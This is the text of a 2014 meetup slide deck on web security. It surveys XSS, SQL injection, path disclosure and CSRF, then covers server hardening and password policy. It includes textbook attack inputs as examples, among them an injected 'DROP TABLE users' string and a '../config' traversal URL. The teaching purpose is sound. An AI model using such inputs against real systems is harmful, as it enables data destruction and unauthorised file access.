Modern Web Security

Bill Condo / @mavrck

Modern Web SecurityAttacks & Improvements

4/2/2014 | Dayton Web Developers


Who here is responsible for a website?


Who here has published code updates live in the last month?


Are they secure?


What We’ll Cover

• Common Threats

• Easy Improvements

• Bonus: Passwords


Common Threats

• Cross Site Scripting

• SQL Injection

• Path Disclosure

• Cross Site Request Forgery

• Information Disclosure


• Denial of Service

• Code Execution

• Memory Corruption

• Arbitrary File

• Local File Include

• Remote File Include

• Buffer overflow


Cross-site scripting (XSS)

• In a nutshell, websites that allow external code to sent with a response to a user’s browser.

• Typically this is javascript that is inserted into a query string or form field that is allowed to run.

• Opens up cookie and sensitive data


SQL Injection

• Allowing user input to directly be inserted into database queries, opening the possibility of unexpected data, and database corruption and data leakage.

• (original) statement = "SELECT * FROM users WHERE id ='" + id + “';"

• (input) 0’; DROP TABLE users

• (final) statement = "SELECT * FROM users WHERE id =‘0'; DROP TABLE users;"


http://xkcd.com/327/


Path Disclosure

• Allowing an attacker to see the path to the web root. /home/site.com/public/index.php

• This could allow viewing of private files, and provides a nugget of knowledge that can be combined to allow full access.

• http://site.com/index.php?page=about

• http://site.com/index.php?page=../config


Cross Site Request Forgery (CSRF)

• Exploits a website’s unauthenticated functionality from an authenticated user. This is commonly from features driven from url parameters that doesn’t have sufficient verification in place.

• http://site.com/send-message.php?from=bill&to=brad&message=hi

• May also be exploited by malicious code injected into a page.


Information Disclosure

• Releasing secure information to an untrusted environment. This can be operating environment, customer data, or trade secrets.

• Path that the website runs at, database info, service versions, etc.

• Credit card data, private account info (address, phone), and customer history.

• Business logic, processes, and long-term business plans.




Easy Improvements

• Secure Your Environment

• Secure Your Website

• Establish Audits


Secure your Environment• Leave your cheap web host (BlueHost, GoDaddy, etc) and go to a Virtual

Private Server (VPS) such as Digital Ocean, Linode, Rackspace, AWS, etc. You don’t want to share security concerns with the world.

• Turn of the displaying of errors and debugging info in production, and redirect them to log files.

• Turn on automatic updates for security patches.

• Turn off broadcasting of service versions and extensions.

• Turn off modules that aren’t required.


Sorry, We’re Not Sharing Security…


Thanks for letting me know…


Secure Your Website

• Sanitize user input. Always.

• Escape and sanitize database queries. Better yet, use an established package for prepared statements.

• Store sensitive data outside of the webroot with proper permissions.

• SSL where possible.

• Sandbox user uploads and treat with suspicion.


Establish Audits

• Black Box: Security/Vulnerability Scanners, Penetration Tests

• White Box: Source Code Analyzers, Code Tests

• Password Testing


More Security Info

• http://www.webappsec.org

• http://www.owasp.org


Stretch.Last minute bucket. We’re in overtime.


Bonus: Password Security

• Terminology

• Landscape/Problems

• Best Practices

• Getting Policy Buy-in


Password Terminology• Encrypting - The process of encoding messages or information in

such a way that only authorized parties can read it*. Encryption typically involves a private key and can be performed two way.

• Hashing - Password hashing is a one way conversion of an input into a representative string. (i.e. nothing = 4fhk348fhsk48rfk4d3)

• Salting - A unique string of characters (hopefully per user) that helps keep the password hashes different for users that have the same password.

*http://en.wikipedia.org/wiki/Encryption


• Entropy (Strength) - A measure of the uncertainty associated with a random variable. (i.e. Password Strength)

• Rainbow Tables - Pre-calculated lookup values that match a string with a value for a known encrypted algorithm.


http://xkcd.com/936/


Problems


State of Passwords

• Most people share between sites

• Most people don’t use secure passwords

• Secure passwords, with high entropy are impossible to remember

• Most people don’t use a password manager


Lack of Transparency

• Web Apps & Sites don’t disclosure their password policies, encryption strength, and their isn’t a standard body to police who’s following best practices and who’s being risky.

• Users often don’t find out what data was compromised from an attack, and frequently don’t find out about an breach at all until it reaches the news cycle.


Forgotten Trail

• With e-commerce, we often have to create an account, provide payment details, and then may never shop there again. However, the data persists.

• Users typically don’t keep a master list of sites they have an account on, or have purchased from. Each account can act as a nugget of knowledge, slowly building up to enough data for concern.


Best PracticesWorst Practices


Don’t help the enemy

• Don’t: Policies that enforce things such as “first character must by upper case” and “must end in a special character”. Allows masking.

• Don’t: To an extent, disclosing the minimum requirements for lower case, upper case, numeric, and special characters.


Garbage in, garbage out

• Don’t: Having no password policy at all.

• Don’t: Allowing common passwords like ‘password’, ‘123456’.

• Don’t: Allowing common dictionary words.


Getting Policy Buy-in


#1 Prevent PR Issues


#2 Cost vs Risk

• Doing security correctly is less expensive upfront. The opportunity cost is minimal compared the reduction in risk. Cost * Risk = Likelihood Cost

• What does it cost to cleanup the mess: reset the passwords, scan the servers, added support calls/requests, etc…


#3 Predictability

• Help project/business managers in being able to minimize unexpected security response events.

• Better understand how your week is going to go.



My Ask of You

• If you found this information useful, I ask two things of you:

• Follow me Twitter for development tips: @mavrck

• Back the Salt Mines Device Lab fundraiser for $1+: http://igg.me/p/728005

• Also, we’re hiring at LMG. Grab a card if you’re currently not next to your boss (otherwise email [email protected]).


Roaring Applause Here.Thanks for your time.

Internet

Modern Web Security